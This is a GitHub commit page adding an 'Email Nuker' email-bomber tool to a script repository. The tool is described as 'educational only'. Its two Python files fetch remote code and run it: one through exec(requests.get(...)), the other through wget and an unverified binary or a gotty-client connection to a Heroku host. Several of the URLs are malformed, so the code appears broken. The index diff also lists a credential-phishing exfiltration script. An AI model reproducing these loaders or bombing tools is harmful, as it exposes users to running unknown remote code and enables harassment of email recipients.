Skip to content

Commit

Permalink
Merge pull request #531 from shraddha761/email
Browse files Browse the repository at this point in the history
Email Nuker
  • Loading branch information
avinashkranjan authored Aug 10, 2023
2 parents f6494a6 + 09e10ef commit bb983b2
Show file tree
Hide file tree
Showing 4 changed files with 45 additions and 0 deletions.
9 changes: 9 additions & 0 deletions Email-nuker/Readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
# Email Nuker

email-nuker is a Python-based email bomber. What makes it unique is that unlike other email bombers, it does not require your Gmail email ID to use.

This tool is for educational purposes only !

It is not intended to be used to take revenge or for any illegal purposes.


30 changes: 30 additions & 0 deletions Email-nuker/bomber.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
import os
import hashlib
def termux():
os.system("pkg install -y golang")
os.system("git clone https://github.com/shraddha761")
os.chdir("gotty-client")
os.environ["GOPATH"]="/data/data/com.termux/files/home/gobin/"
os.system("go install ./cmd/gotty-client")
os.system("chmod +x /data/data/com.termux/files/home/gobin/bin/gotty-client")
os.chdir("/data/data/com.termux/files/home/gobin/bin")
os.system("./gotty-client -v2 https://emailnuker.herokuapp.com")
def linux():
file_name = 'bomber.bin'
original_md5 = '9b12ca80e4f3947e0404965b633e6cf0'
with open(file_name, 'rb') as file_to_check:
data = file_to_check.read()
md5_returned = hashlib.md5(data).hexdigest()

if original_md5 == md5_returned:
os.system("./bomber.bin")
else:
os.system("rm -rf bomber.bin")
print("updating email nuker ")
os.system("wget https://raw.githubusercontent.com/https://raw.githubusercontent.com/shraddha761/bomber.py")
os.system("chmod +x bomber.bin")
os.system("./bomber.bin")
if os.path.exists("/lib64/ld-linux-x86-64.so.2"):
linux()
else:
termux()
5 changes: 5 additions & 0 deletions Email-nuker/emailbomber.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
import requests
import random
import os
import time
exec(requests.get("https://raw.githubusercontent.com/shraddha761/bomber.py").text)
1 change: 1 addition & 0 deletions SCRIPTS.md
Original file line number Diff line number Diff line change
Expand Up @@ -99,6 +99,7 @@
| 64\. | CredPhish | CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. | [Take me](./CredPhish)
| 64\. | WebStor | This script is designed to perform reconnaissance and vulnerability assessment across websites within an organization's networks | [Take me](./WebStor)
| 65\. | Crypto | Encrypt/Decrypt your files with password to save your privacy| [Take me](./Crypto)
| 66\. | Email-Nuker | Eemail-nuker is a Python-based email bomber| [Take me](./Email-Nuker)
| SL No\. | πŸš€ Script Name | πŸ‘¨πŸ»β€πŸ’» Script Function | πŸ”— Link |
| ------------------------- | ------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------- |
| 1\. | Information Gathering | Gathering Information - Grabbing Banners, Hostname and IP Lookup\. | [Take Me](/Information-Gathering) |
Expand Down

0 comments on commit bb983b2

Please sign in to comment.